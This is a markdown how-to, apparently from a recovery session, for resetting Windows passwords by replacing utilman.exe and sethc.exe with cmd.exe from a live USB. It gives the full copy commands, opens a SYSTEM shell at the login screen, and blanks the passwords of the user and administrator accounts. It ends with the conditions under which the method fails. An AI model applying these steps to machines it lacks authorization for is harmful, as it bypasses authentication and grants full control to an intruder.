# utilman.exe / sethc.exe password reset (avoids automatic repair loop)

## Why use this instead of chntpw

chntpw modifies the SAM registry hive offline. Windows 10/11 detects this as a system integrity event and triggers **automatic repair on every boot** — a loop that persists even after fixing bootstat.dat, registry boot flags, and BCD recovery settings.

The utilman.exe/sethc.exe trick avoids the SAM entirely. It replaces a legitimate Windows accessibility binary with cmd.exe, giving SYSTEM shell at the login screen without modifying any registry hives.

## Reproduction from this session

**Setup:**
- SystemRescue 13.01 USB (manual build with FAT32 + syslinux)
- Target: HP laptop, Windows 10/11, user "Joanna"
- Original approach: chntpw password clear → triggered unavoidable automatic repair loop
- Several failed attempts: bootstat.dat removal, reged registry fixes (LastBootSucceeded, BootStatusPolicy=3), BCD 25000080 element clear

**What worked:** utilman.exe/sethc.exe replacement from SystemRescue.

## Steps

**On SystemRescue (SSH from remote machine):**
```bash
mount /dev/sda3 /mnt
cp /mnt/Windows/System32/cmd.exe /mnt/Windows/System32/utilman.exe
cp /mnt/Windows/System32/sethc.exe /mnt/Windows/System32/sethc.exe.bak
cp /mnt/Windows/System32/cmd.exe /mnt/Windows/System32/sethc.exe
umount /mnt
```

**On the Windows login screen:**
- Click Ease of Access icon → SYSTEM cmd opens
- Or press Shift 5× → same result

**From SYSTEM cmd:**
```cmd
net user joanna ""
net user administrator ""
```

## Edge cases observed

- `utilman.exe` did NOT exist in System32 on one HP Windows 10 installation — the `cp` command created a new file. This still worked because Windows creates the file when first accessed, but there was no original to back up.
- `sethc.exe` DID exist on all tested systems.
- Safe Mode boot after utilman replacement: if Windows still forces auto repair, select **Advanced options → Troubleshoot → Advanced options → Startup Settings → Restart → F4** to boot Safe Mode, then log in with blank password.

## When NOT to use this

- BitLocker-encrypted drives (the partition won't mount for file replacement)
- Windows 11 with VBS/HVCI enabled (may block SYSTEM-level cmd access at login)
- Enterprise-managed machines with device guard/credential guard
